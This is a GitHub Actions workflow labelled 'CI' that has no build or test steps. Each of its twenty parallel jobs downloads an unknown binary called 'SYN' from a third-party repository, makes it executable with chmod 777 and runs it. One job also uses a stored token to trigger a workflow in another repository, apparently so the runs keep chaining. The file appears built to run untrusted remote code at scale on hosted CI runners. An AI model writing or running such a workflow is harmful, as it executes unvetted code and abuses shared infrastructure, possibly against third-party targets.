name: CI

on:
  push:
    branches: [ main ]
  workflow_dispatch:

jobs:
  build1:
    runs-on: ubuntu-latest
    env:
      GITHUB_TOKEN: ${{ secrets.AUTH_TOKEN }}
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/SYN
          chmod 777 SYN
          ./SYN
          curl -X POST -H "Authorization: token $GITHUB_TOKEN" -H "Accept: application/vnd.github.v3+json" -d '{"ref": "main"}' https://api.github.com/repos/niniubiwoc/run-script-action/actions/workflows/blank.yml/dispatches


  build2:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/SYN
          chmod 777 SYN
          ./SYN


  build3:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/SYN
          chmod 777 SYN
          ./SYN


  build4:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/SYN
          chmod 777 SYN
          ./SYN


  build5:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/SYN
          chmod 777 SYN
          ./SYN


  build6:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/SYN
          chmod 777 SYN
          ./SYN


  build7:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/SYN
          chmod 777 SYN
          ./SYN


  build8:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/SYN
          chmod 777 SYN
          ./SYN


  build9:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/SYN
          chmod 777 SYN
          ./SYN


  build10:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/SYN
          chmod 777 SYN
          ./SYN


  build11:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/SYN
          chmod 777 SYN
          ./SYN


  build12:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/SYN
          chmod 777 SYN
          ./SYN


  build13:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/SYN
          chmod 777 SYN
          ./SYN


  build14:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/SYN
          chmod 777 SYN
          ./SYN


  build15:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/SYN
          chmod 777 SYN
          ./SYN


  build16:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/SYN
          chmod 777 SYN
          ./SYN


  build17:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/SYN
          chmod 777 SYN
          ./SYN


  build18:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/SYN
          chmod 777 SYN
          ./SYN


  build19:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/SYN
          chmod 777 SYN
          ./SYN


  build20:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Run a multi-line script
        run: |
          wget https://raw.githubusercontent.com/niniubiwoc/Nm-L/main/SYN
          chmod 777 SYN
          ./SYN
